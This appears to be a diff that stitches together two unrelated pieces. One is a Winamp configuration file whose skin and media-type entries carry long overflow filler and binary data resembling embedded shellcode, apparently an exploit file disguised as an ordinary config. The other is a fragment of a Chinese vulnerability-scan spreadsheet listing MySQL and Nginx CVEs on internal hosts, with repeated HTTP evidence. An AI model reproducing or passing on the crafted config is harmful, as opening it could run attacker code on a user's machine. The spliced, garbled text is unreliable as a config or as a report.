+[Winamp]
+utf8=1
+skin=PrPrYr_r�r-�rHrHrHrHrÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rÆr@rrÆfr@rÆr@rÆÊr@rÆÿr@rÆr@rÆBr@rÆRr@rÆjr@rÆr@r4444ð0rÆXr@rÆÍr@rÆ.r@rÆ&lt;r@rÆr@rÆZr@rÆtr@rÆïr@rÆ¸r@rÆar@rÆyr@rÆmr@rÆnr@rÆr@rÆúr@rÆ¯r@rÆur@rÆêr@rÆ¯r@rÆur@rÆçr@rÆÿr@rÆçrWrÃ44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
+[WinampReg]
+IsFirstInst=0
+NeedReg=0
+[in_wm]
+numtypes=7
+type0=WMA
+description0=Windows Media Audio File (*.WMA)
+protocol0=0
+avtype0=0
+type1=WMV
+description1=Windows Media Video File (*.WMV)
+protocol1=0
+avtype1=1
+type2=ASF
+description2=Advanced Streaming Format (*.ASF)
+protocol2=0
+avtype2=1
+type3=MMS://
+description3=Windows Media Stream
+protocol3=1
+avtype3=1
+type4=MMSU://
+description4=Windows Media Stream
+protocol4=1
+avtype4=1
+type5=MMST://
+description5=Windows Media Stream
+protocol5=1
+avtype5=1
+type5=�
+description6=aymnaymn�К[�t$�Z+ɱE�1zz�^,rҠ̓�)(�M8�'l�J�B�(�xIi��5[�Br�&lt;+�X�3�ѫa�k�Q�)ٯ�H� ;ӕ�Y�6#�Gd�?2�Ee��{	�s_�?��ar��	ЀH�P�n�9�X�g/�@ו�c�=�W�=�,�4ۥu݂&lt;Ā4���:�h�`��8�ӂ�mT.�Bǐ�s�r��c�z�#0V�Ċ�i�#O�M�=�R_���'N�WA&gt;-�niC|��ϸ&lt;�Ny�
+protocol6=0
+avtype6=0
+</t>
+        </is>
+      </c>
+      <c r="X21" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y21" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="22">
+      <c r="A22" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B22" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C22" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D22" t="inlineStr"/>
+      <c r="E22" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F22" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G22" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H22" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I22" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J22" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K22" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="L22" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="M22" t="inlineStr">
+        <is>
+          <t>192.168.64.44</t>
+        </is>
+      </c>
+      <c r="N22" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O22" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P22" t="inlineStr"/>
+      <c r="Q22" t="inlineStr"/>
+      <c r="R22" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S22" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T22" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U22" t="inlineStr"/>
+      <c r="V22" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W22" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X22" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y22" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="23">
+      <c r="A23" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B23" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C23" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D23" t="inlineStr"/>
+      <c r="E23" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F23" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G23" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H23" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I23" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J23" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K23" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="L23" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="M23" t="inlineStr">
+        <is>
+          <t>192.168.64.44</t>
+        </is>
+      </c>
+      <c r="N23" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O23" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P23" t="inlineStr"/>
+      <c r="Q23" t="inlineStr"/>
+      <c r="R23" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S23" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T23" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U23" t="inlineStr"/>
+      <c r="V23" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W23" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X23" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y23" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="24">
+      <c r="A24" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B24" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C24" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D24" t="inlineStr"/>
+      <c r="E24" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F24" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G24" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H24" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I24" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J24" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K24" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="L24" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:22</t>
+        </is>
+      </c>
+      <c r="M24" t="inlineStr">
+        <is>
+          <t>192.168.66.176</t>
+        </is>
+      </c>
+      <c r="N24" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O24" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P24" t="inlineStr"/>
+      <c r="Q24" t="inlineStr"/>
+      <c r="R24" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S24" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T24" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U24" t="inlineStr"/>
+      <c r="V24" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W24" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X24" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y24" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="25">
+      <c r="A25" t="inlineStr">
+        <is>
+          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+        </is>
+      </c>
+      <c r="B25" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C25" t="inlineStr">
+        <is>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D25" t="inlineStr"/>
+      <c r="E25" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+        </is>
+      </c>
+      <c r="F25" t="inlineStr">
+        <is>
+          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+        </is>
+      </c>
+      <c r="G25" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H25" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I25" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J25" t="inlineStr">
+        <is>
+          <t>CVE-2021-23017</t>
+        </is>
+      </c>
+      <c r="K25" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:23</t>
+        </is>
+      </c>
+      <c r="L25" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:22</t>
+        </is>
+      </c>
+      <c r="M25" t="inlineStr">
+        <is>
+          <t>192.168.66.176</t>
+        </is>
+      </c>
+      <c r="N25" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O25" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P25" t="inlineStr"/>
+      <c r="Q25" t="inlineStr"/>
+      <c r="R25" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S25" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T25" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U25" t="inlineStr"/>
+      <c r="V25" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W25" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
+Last-Modified: Mon, 09 May 2022 18:02:01 GMT
+Connection: keep-alive
+ETag: "62795719-704"
+X-Frame-Options: SAMEORIGIN
+X-XSS-Protection: 1; mode=block
+X-Content-Type-Options: nosniff
+Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
+Content-Security-Policy: frame-ancestors: self
+Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
+</t>
+        </is>
+      </c>
+      <c r="X25" t="inlineStr">
+        <is>
+          <t>待处置</t>
+        </is>
+      </c>
+      <c r="Y25" t="inlineStr">
+        <is>
+          <t>内网</t>
+        </is>
+      </c>
+    </row>
+    <row r="26">
+      <c r="A26" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+        </is>
+      </c>
+      <c r="B26" t="inlineStr">
+        <is>
+          <t>尽快修复</t>
+        </is>
+      </c>
+      <c r="C26" t="inlineStr">
+        <is>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D26" t="inlineStr"/>
+      <c r="E26" t="inlineStr">
+        <is>
+          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+        </is>
+      </c>
+      <c r="F26" t="inlineStr">
+        <is>
+          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+        </is>
+      </c>
+      <c r="G26" t="inlineStr">
+        <is>
+          <t>有攻击代码披露</t>
+        </is>
+      </c>
+      <c r="H26" t="inlineStr">
+        <is>
+          <t>云镜</t>
+        </is>
+      </c>
+      <c r="I26" t="inlineStr">
+        <is>
+          <t>原理扫描</t>
+        </is>
+      </c>
+      <c r="J26" t="inlineStr">
+        <is>
+          <t>CVE-2020-14836</t>
+        </is>
+      </c>
+      <c r="K26" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="L26" t="inlineStr">
+        <is>
+          <t>2026-07-14 09:11</t>
+        </is>
+      </c>
+      <c r="M26" t="inlineStr">
+        <is>
+          <t>192.168.50.190</t>
+        </is>
+      </c>
+      <c r="N26" t="inlineStr">
+        <is>
+          <t>终端</t>
+        </is>
+      </c>
+      <c r="O26" t="inlineStr">
+        <is>
+          <t>管理IP范围</t>
+        </is>
+      </c>
+      <c r="P26" t="inlineStr"/>
+      <c r="Q26" t="inlineStr"/>
+      <c r="R26" t="inlineStr">
+        <is>
+          <t>普通资产</t>
+        </is>
+      </c>
+      <c r="S26" t="inlineStr">
+        <is>
+          <t>台账资产</t>
+        </is>
+      </c>
+      <c r="T26" t="inlineStr">
+        <is>
+          <t>123</t>
+        </is>
+      </c>
+      <c r="U26" t="inlineStr"/>
+      <c r="V26" t="inlineStr">
+        <is>
+          <t>未知</t>
+        </is>
+      </c>
+      <c r="W26" t="inlineStr">
+        <is>
+          <t xml:space="preserve">页面url: -
+请求体: GET /login.html HTTP/1.1
+Host: 129.195.085.043:443
+User-Agent: python-requests/2.23.0
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Range: bytes=0-99999\r\n\r\n
+响应体: HTTP/1.1 200 OK
+Server: 
+Date: Tue, 10 May 2022 11:52:26 GMT
+Content-Type: text/html
+Content-Length: 1796
